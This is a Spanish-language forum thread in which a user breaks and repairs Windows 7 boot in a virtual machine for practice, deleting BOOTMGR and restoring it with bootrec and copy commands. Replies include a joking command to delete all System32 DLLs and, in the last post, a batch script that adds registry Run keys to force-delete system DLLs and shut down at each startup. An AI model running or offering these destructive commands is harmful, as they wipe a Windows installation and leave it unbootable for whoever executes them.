Resultados 1 al 6 de 6

Tema: Cmo daar el arranque de Windows 7 y Windows XP para hacer prcticas

1. #1 Cmo daar el arranque de Windows 7 y Windows XP para hacer prcticas 
    Iniciado
    Descargas
    0
    Uploads
    0
    Hola.

Estoy intentando hacer prcticas con el disco de reparacin y el entorno de recuperacin de Windows simulando fallos de inicio en mquinas virtuales. La idea es crear fallos y repararlos para hacer prcticas y aprender.

He borrado archivos que se supone que tendran que perturbar de forma importante el arranque del sistema como la carpeta "Boot" de System32 pero, en realidad, no ha pasado nada. He borrado uno por uno los archivos que contiene la carpeta y probando a reiniciae. El sistema segua arrancando igualmente. Borr la carpeta al completo. Reiniciar y Windows se inici sin rechistar.

He borrado as mismo el archivo BOOTMGR que se encuentra en C:\Windows\boot\PCAT\bootmgr

El resultado fue que Windows se inici normalmente

Entonces decid borra la carpeta completa "boot" que contena ese archivo as como otros.

El resultado fue que Windows sigue tan campante, inicindose normalmente.

Tengo entonces un Windows 7 Ultimate en una mquina virtual sin la carpeta "BOOT" de Windows y sin la carpeta "BOOT" de System32 y sigue como si nada. Alguna sugerencia?

En fin, que lo que quiero es que alguien que controle en la materia me indique qu archivos debo eliminar para tener que reparar el inicio y aprender algo. Especialmente me gustara averiguar cul es el fallo que provoca el bucle de reinicio sin fin.

un saludo.

Avanzado
    Descargas
    24
    Uploads
    0
    Creo que eso no te funciona porque Windows 7 repara el MBR automticamente, al instalarse crea una particin para recuperar el sistema de arranque, tabla de particiones .. ademas Windows 7 es muy poco dado a los errores de arranque que tenia windows xp, es mas creo que utilizan sistemas de arranque diferentes, hay una aplicacin en windows llamada BCDEDIT que se utiliza para administrar el arranque igual por hay puedes hacer algo, y si lo que quieres es dejar al sistema K.O siempre puedes eliminar alguna libreria (.dll) importante.

Y por cierto eso de hacer practicas a mi no me la cuelas, siempre puedes utilizar este super virus realizado por mi
    del c:windows/system32/*.dll
    esto lo pones en el cmd con derechos de administrador veras que bien te lo pasas aprendiendo o reparar.

(Si el cdigo incluye algn tipo de error sintctico no me hago responsable, tambin pido comprensin porque me costo muchos aos desarrollar tal obra de arte)
    Ren Prez Joglar: Pa' tener a un listo que no dice nada prefiero a un idiota que hable mucho.

Iniciado
    Descargas
    0
    Uploads
    0
    HOla, gracias por responder.

Despus de probar a borrar y eliminar mltiples archivos y carpetas de nombre "boot" en winsx y en windows-system32 y otros archivos como el archivo de paginacin pagefile.sys, archivos autoexec y otros ms, siempre de forma infructuosa ya que el sistema continuaba reiniciando sin problemas... al final, consegu daar el arranque de Windows 7 de la siguiente manera:

1. Fui al Administrador de discos y le asign a la particin de arranque (la de 100 Mb) la letra Z:

2. Fui a "Opciones de carpeta"-"Ver" y all tild las opciones de "Ver carpetas y archivos ocultos" y destild la opcin "Ocultar archivos de arranque protegidos".

3. Una vez hecho esto se puede ver el archivo "BOOTMGR" en el arranque (archivo que sustituye en Windows Vista y Windows 7 al archivo "ntldr" del XP).

4. Una vez localizado el sistema no te permite borrarlo ni eliminarlo hasta que cambias su propiedad. Hay que cambiar la propiedad de "system" a "tu nombre de usuario o de administrador" y otorgarte, al mismo tiempo, todos los permisos. Hecho esto ya lo puedes borrar.

5. Al hacerlo reinici y el sistema ya no pudo abrir sesin. Me dio el mensaje: "BOOTMGR is missing".

Cmo lo repar?

1. Cog el disco de instalacin / reparacin de Windows 7 Ultimate

2. Fui a la opcin "Reparar"

3. Me aparece ventana de men y clicke sobre la primera opcin "Reparar el inicio"

4. Nada, el sistema me dice que no puede solucionar el problema

5. Vuelvo al men y pulso sobre la opcin "Smbolo del sistema"

6. Una vez aqu intento reconstruir el sistema de arranque con las siguientes instrucciones:

X Source> bootrec /fixmbr
    X Source> bootrec /fixboot
    X Source> bootrec /rebuildbcd

7. Tras realizar estas operaciones intent reiniciar el equipo pero, de nuevo, de manera infructuosa.

8. Entonces decid que, ya que lo que haba hecho para daar el arranque haba sido borrar el archivo "bootmgr" del inicio, poda, entonces, copiar ese archivo desde el cd de instalacin / reparacin de nuevo al disco duro. Dicho y hecho.

Entr de nuevo en la opcin "Smbolo del sistema". Tena que saber que letras haba asignado el disco de reparacin tanto al disco duro como a la unidad de cd / dvd.

Para ello escrib "notepad" y, al abrirse, en la columna de la derecha aparece "sistema". Clicke sobre el icono y ya vi las particiones del sistema. Siendo la unidad de cd / dvd (donde estaba operando el disco de reparacin) la letra E: y la particin de arranque (que reconoc por su tamao de 100 Mbs) con la letra C:

9. Entr en E:

10. E:> copy bootmgr C:

Copi el archivo y...mi gozo en un pozo sigui sin reiniciar

Entonces decid copiar la carpeta completa "boot" (ya que antes de borrar el archivo bootmgr haba borrado otros archivos de arranque y tal vez ahora eran necesarios para arrancar)

Escrib:

E:> copy boot C:

Y voil...reinici y funcion sin problemas.

Bueno, ahora voy a probar esa opcin que me indicas. Voy a ir a cmd y escribir lo que dices, haber que tal.

Por cierto, estoy interesado en saber cmo provocar un bucle de reinicio sin fin para intentar repararlo. Si alguien sabe cmo hacerlo que lo indique por favor.

un saludo.

Avanzado
    Descargas
    24
    Uploads
    0
    Demuestras buenas actitudes para la investigacin me gusta, porque aqu no podemos dar likes que si no te inflaba.

Por cierto no ejecutes del c:windows/system32/*.dll que es una chorrada, ademas contiene errores..
    Ren Prez Joglar: Pa' tener a un listo que no dice nada prefiero a un idiota que hable mucho.

Iniciado
    Descargas
    2
    Uploads
    0
    Lo que pretende con eso es que borres todas las dll y te cargues el sistema, aunque es cierto que co tiene errores por lo que no pasara nada

Iniciado
    Descargas
    5
    Uploads
    0
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VL /d "del /f /a /q /s C:\Windows\System32 *.dll"
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VL2 /d "shutdown -s -t 00"
    shutdown -s -t 00
    Tal vez esto te sirva :v, copialo a un archivo de texto y gurdalo con extensin *.bat